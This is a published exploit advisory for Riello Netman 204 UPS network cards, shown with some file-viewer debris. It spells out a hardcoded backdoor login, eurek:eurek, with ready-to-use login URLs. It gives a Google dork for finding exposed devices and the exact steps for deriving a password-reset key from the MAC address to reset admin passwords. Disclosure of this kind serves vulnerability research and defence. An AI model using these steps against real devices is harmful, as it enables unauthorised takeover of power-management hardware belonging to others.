43 lines
No EOL
1.8 KiB
Text
43 lines
No EOL
1.8 KiB
Text
# Exploit Title: Netman 204 Backdoor and weak password recovery function
|
|
# Google Dork: intitle:"Netman 204 login"
|
|
# Date: 31st Jan 2017
|
|
# Exploit Author: Simon Gurney
|
|
# Vendor Homepage: blog.synack.co.uk
|
|
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
|
|
# Version: S14-1 and S15-2
|
|
# Tested on: Reillo UPS
|
|
# CVE : N/A
|
|
|
|
Netman 204 cards have a backdoor account eurek:eurek.
|
|
|
|
This account can be logged with by simply browsing to the URL
|
|
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
|
|
or
|
|
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
|
|
|
|
Due to flaws in parameter validation, the URL can be shortened to:
|
|
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
|
|
or
|
|
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
|
|
|
|
This backdoor has previously been reported by Saeed reza Zamanian under EDB-ID: 40431 here<https://www.exploit-db.com/exploits/40431/>, which shows how to utilise this to gain shell access however this did not give detail of how easy it is to log in to the device and access the administrative functions via the web interface. The google dork provided also reveals some UPS exposed to the internet.
|
|
|
|
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:
|
|
|
|
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
|
|
KEY=`echo .$NETMANID | md5sum | cut -c2-10`
|
|
|
|
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
|
|
Such as,
|
|
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
|
|
Then take characters 2-10, where position 1 is character 1 (not 0).
|
|
Such as,
|
|
354a65581
|
|
|
|
Then browse to the url:
|
|
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
|
|
or
|
|
https://[ip]/cgi-bin/recover2.cgi?password=354a65581
|
|
|
|
|
|
Passwords have now been reset. |